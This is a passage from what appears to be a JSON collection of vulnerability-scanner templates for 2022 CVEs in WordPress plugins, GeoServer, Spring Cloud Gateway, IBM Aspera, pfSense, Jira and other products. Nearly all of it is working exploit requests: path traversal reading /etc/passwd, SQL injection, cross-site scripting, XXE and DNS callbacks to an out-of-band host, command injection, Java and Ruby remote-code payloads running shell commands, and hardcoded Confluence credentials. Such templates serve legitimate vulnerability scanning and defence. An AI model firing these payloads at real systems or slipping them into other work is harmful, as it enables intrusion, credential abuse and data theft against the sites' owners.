Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://example.com\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(5)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-46463","info":{"name":"Harbor <=2.5.3 - Unauthorized Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v2.0/search?q=/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository_name","project_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 